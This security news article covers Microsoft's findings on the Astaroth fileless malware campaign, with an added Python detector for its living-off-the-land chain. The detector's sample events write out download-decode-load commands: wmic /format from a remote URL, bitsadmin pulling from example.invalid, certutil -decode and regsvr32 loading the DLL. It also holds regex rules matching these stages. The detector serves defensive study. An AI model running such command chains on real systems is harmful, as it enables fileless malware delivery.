Microsoft has warned of a new fileless malware attack campaign that completely “lives off the land” in a bid to escape detection.
Andrea Lelli of the computing giant’s Microsoft Defender ATP Research Team first detected the Astaroth campaign after noticing a May-June spike in the use of the Windows Management Instrumentation Command-line (WMIC) tool to run a script.
This is a technique commonly used in fileless malware attacks, and so it proved this time: the attackers spread the info-stealing malware via a spear-phishing link to a .LNK file.
“When double-clicked, the LNK file causes the execution of the WMIC tool with the ‘/Format’ parameter, which allows the download and execution of a JavaScript code. The JavaScript code in turn downloads payloads by abusing the Bitsadmin tool,” Lelli explained.
“All the payloads are Base64-encoded and decoded using the Certutil tool. Two of them result in plain DLL files (the others remain encrypted). The Regsvr32 tool is then used to load one of the decoded DLLs, which in turn decrypts and loads other files until the final payload, Astaroth, is injected into the Userinit process.”
During the entire process, no file is run that isn’t a legitimate system tool, which could make the attack difficult for legacy security solutions to detect.
Heuristics and behavioral monitoring capabilities are key to spotting such fileless threats, because they focus on detecting anomalous behavior rather than looking for signatures or executables, Lelli concluded.
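As an added illustration of the behavioral monitoring Lelli describes (example code written for this page, not Microsoft's or the article's own), the rules below flag the WMIC /Format, Bitsadmin, Certutil and Regsvr32 stages from process-creation telemetry and only alert when several of them appear under one process tree; the events, paths and URLs are constructed.

```python
import re

# Constructed process-creation events (not real telemetry); the fields mimic
# what an EDR or Sysmon process-create record carries.
EVENTS = [
    {"pid": 100, "ppid": 1, "image": "explorer.exe", "cmd": "explorer.exe"},
    {"pid": 101, "ppid": 100, "image": "wmic.exe",
     "cmd": 'wmic os get /format:"http://example.invalid/v.xsl"'},
    {"pid": 102, "ppid": 101, "image": "bitsadmin.exe",
     "cmd": "bitsadmin /transfer j /download http://example.invalid/p1 C:\\Users\\Public\\p1.txt"},
    {"pid": 103, "ppid": 101, "image": "certutil.exe",
     "cmd": "certutil -decode C:\\Users\\Public\\p1.txt C:\\Users\\Public\\p1.dll"},
    {"pid": 104, "ppid": 101, "image": "regsvr32.exe",
     "cmd": "regsvr32 /s C:\\Users\\Public\\p1.dll"},
    # Benign admin use of certutil: a single stage on its own must not alert.
    {"pid": 200, "ppid": 1, "image": "certutil.exe", "cmd": "certutil -verify cert.cer"},
]

# One rule per stage the article lists: (stage, process image, command-line pattern).
RULES = [
    ("wmic_remote_format", "wmic.exe", re.compile(r'/format:\s*"?https?://', re.I)),
    ("bitsadmin_download", "bitsadmin.exe", re.compile(r"/(transfer|download)\b.*https?://", re.I)),
    ("certutil_decode", "certutil.exe", re.compile(r"\s-decode\b", re.I)),
    ("regsvr32_dll_load", "regsvr32.exe", re.compile(r"\.dll\b", re.I)),
]

def match_stages(events):
    """Return (stage, pid) for every event whose image and command line match a rule."""
    return [(stage, ev["pid"]) for ev in events for stage, image, pat in RULES
            if ev["image"].lower() == image and pat.search(ev["cmd"])]

def ancestors(events, pid):
    """Walk the parent chain from pid upward, stopping at the first unknown parent."""
    by_pid = {e["pid"]: e for e in events}
    chain = []
    while pid in by_pid:
        chain.append(pid)
        pid = by_pid[pid]["ppid"]
    return chain

def detect_lolbin_chain(events, min_stages=3):
    """Group stage hits by the oldest matching ancestor in their process tree and
    alert on trees that show at least min_stages distinct stages."""
    hits = match_stages(events)
    hit_pids = {pid for _, pid in hits}
    trees = {}
    for stage, pid in hits:
        anchor = [p for p in ancestors(events, pid) if p in hit_pids][-1]
        trees.setdefault(anchor, set()).add(stage)
    return {a: sorted(s) for a, s in trees.items() if len(s) >= min_stages}
```

Run against the sample events, the WMIC tree (pid 101) alerts with all four stages while the lone `certutil -verify` process does not.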
Fileless malware and “living off the land” techniques have been around for several years, although they’re being used with increasing frequency today.
Malwarebytes claimed that such attacks comprised around 35% of total threats in 2018, and are 10 times more likely to succeed than file-based attacks.
Earlier this year, Trend Micro revealed a massive 819% increase in detections of fileless threats between August 2017 and December 2018. It claimed that sandboxing, as well as monitoring behavioral indicators and traffic, can help the white hats to combat this growing threat.